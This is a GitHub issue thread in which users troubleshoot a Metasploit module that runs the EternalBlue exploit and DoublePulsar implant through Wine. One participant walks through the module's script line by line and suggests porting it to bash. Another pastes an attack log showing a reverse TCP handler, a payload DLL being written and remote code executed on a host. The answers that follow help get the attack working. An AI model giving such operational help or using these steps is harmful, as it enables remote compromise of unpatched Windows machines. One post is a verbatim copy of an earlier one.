Failed to load module

[Jortsyy]

whenever i use the command use exploit/windows/smb/eternalblue_doublepulsar

it gives me an error saying: "failed to load module: exploit/windows/smb/eternalblue_doublepulsar"

i moved the rb file to the windows.smb directory so i dont know what to do

[peterpt]

The problem is not the module itself , this module is not running in msf5 , latest git . My first guess is the required dependency msfcore on the start of the ruby script . However , the guys here did an excellent job decoding how the xml files for eternalblue and doublepulsar should be written to exploit the target . By looking into the ruby script it is easy to see that before launchine those exes with wine , they copy the skeleton xml files to their final name and change the values that user have wroted on metasploit module , like rhost , timeout , target , etc .... Any bash script with sed to change those values like they did and creating the payloads with those bad chars is enough to run the doublepulsar implant with eternalblue.exe and running the doublepulsar.exe ahead to call the backdoor and inject the payload . It is pretty simple .

I hope they find the xml tricks to do all the other executables in the package . Thinking a bit more on it , basically it is just needed to run fuzzbunch package with some target with smb vulnerable and the original python scripts will do the work that i am asking to Elevenpaths .

Look here : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

some simple explanation :

Line 24 : this is for the payload that metasploit will create Line 67 : They do the copy of the skeleton file Line 68,69,70 : They write in the eternalblue.xml file the rhost,rport &timeout values Line 74 : defines the target for W7,2008 & vista with value : WIN72K8R2 on the xml line 76 : defines everything else , xp , server 2003 with XP value on xml line 79 : they write one of those values on the xml file from line 82 to 91 : they do the same for double pulsar config Line 95 to 101 : they create the payload to doublepulsar inject on the target Line 106 : They launch "wine Eternalblue-2.2.0.exe" amd wait for the output of it line 107 : checks the output if it returned succefully or not and show you the message" line 115 : they launch doublepulsar with wine and also wait for the output .

It is pretty simple the code , basically it is almost like copying all of it and paste it on a bashscript with some adapted changes and it will run perfectly .

[AtharavRH]

The problem is not the module itself , this module is not running in msf5 , latest git . My first guess is the required dependency msfcore on the start of the ruby script . However , the guys here did an excellent job decoding how the xml files for eternalblue and doublepulsar should be written to exploit the target . By looking into the ruby script it is easy to see that before launchine those exes with wine , they copy the skeleton xml files to their final name and change the values that user have wroted on metasploit module , like rhost , timeout , target , etc .... Any bash script with sed to change those values like they did and creating the payloads with those bad chars is enough to run the doublepulsar implant with eternalblue.exe and running the doublepulsar.exe ahead to call the backdoor and inject the payload . It is pretty simple .

I hope they find the xml tricks to do all the other executables in the package . Thinking a bit more on it , basically it is just needed to run fuzzbunch package with some target with smb vulnerable and the original python scripts will do the work that i am asking to Elevenpaths .

Look here : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

some simple explanation :

Line 24 : this is for the payload that metasploit will create Line 67 : They do the copy of the skeleton file Line 68,69,70 : They write in the eternalblue.xml file the rhost,rport &timeout values Line 74 : defines the target for W7,2008 & vista with value : WIN72K8R2 on the xml line 76 : defines everything else , xp , server 2003 with XP value on xml line 79 : they write one of those values on the xml file from line 82 to 91 : they do the same for double pulsar config Line 95 to 101 : they create the payload to doublepulsar inject on the target Line 106 : They launch "wine Eternalblue-2.2.0.exe" amd wait for the output of it line 107 : checks the output if it returned succefully or not and show you the message" line 115 : they launch doublepulsar with wine and also wait for the output .

It is pretty simple the code , basically it is almost like copying all of it and paste it on a bashscript with some adapted changes and it will run perfectly .

hey peterpt, i am really very thankfull for this info....am still not that pro... i request you to please please elaborate how to fix this.... i am stuck on thid error since 4 days..... any master mind here ?please help me thannks alot,may god bless u, n have nice day in advance

[peterpt]

1st of all you need wine 32bit installed , if your system is running wine 64 bit then it will not able to run the executables from fuzzbunch . watch this video

https://www.youtube.com/watch?v=dJi5Dshaz-g

[AtharavRH]

I am running it Kali Linux.

On Fri, Apr 10, 2020, 9:25 PM peterpt notifications@github.com wrote:

1st of all you need wine 32bit installed , if your system is running wine 64 bit then it will not able to run the executables from fuzzbunch . watch this video

https://www.youtube.com/watch?v=dJi5Dshaz-g

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/73#issuecomment-612092997, or unsubscribe https://github.com/notifications/unsubscribe-auth/ALJIWA2RTRORE27WM2YMGTTRL46N3ANCNFSM4EQG7QBQ .

[peterpt]

It is the same procedure , the only difference is if you installed metasploit framework from apt or it is already installed then then metasploit should be in /usr/local/share/metasploit-framework directory . You have too look for it in your system . Sorry , i dont use kali linux , i only installed their kernel to have access to their patched wireless drivers , all other stuff is devuan linux including the system init .

Get https://github.com/peterpt/eternal_check and run it , eternal check do not exploit , only checks if an ip is vulnerable to what double pulsar exploits , however when you get eternal check working then this exploit will work too , the only difference is that eternal check warns you of what you must do to make it work .

[lilplucky]

Hey people i need your help in getting this to work.

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[] Started reverse TCP handler on 192.168.43.95:4444 [] 192.168.43.92:445 - Generating Eternalblue XML data [] 192.168.43.92:445 - Generating Doublepulsar XML data [] 192.168.43.92:445 - Generating payload DLL for Doublepulsar [] 192.168.43.92:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.43.92:445 - Launching Eternalblue... 0030:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 0030:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 0030:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142 [+] 192.168.43.92:445 - Backdoor is already installed [] 192.168.43.92:445 - Launching Doublepulsar... 002f:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 002f:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 002f:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142 [+] 192.168.43.92:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created. msf6 exploit(windows/smb/eternalblue_doublepulsar) >

[peterpt]

you have a wine instalation issue , make sure you select wine windows emulation OS winxp or 7 32bit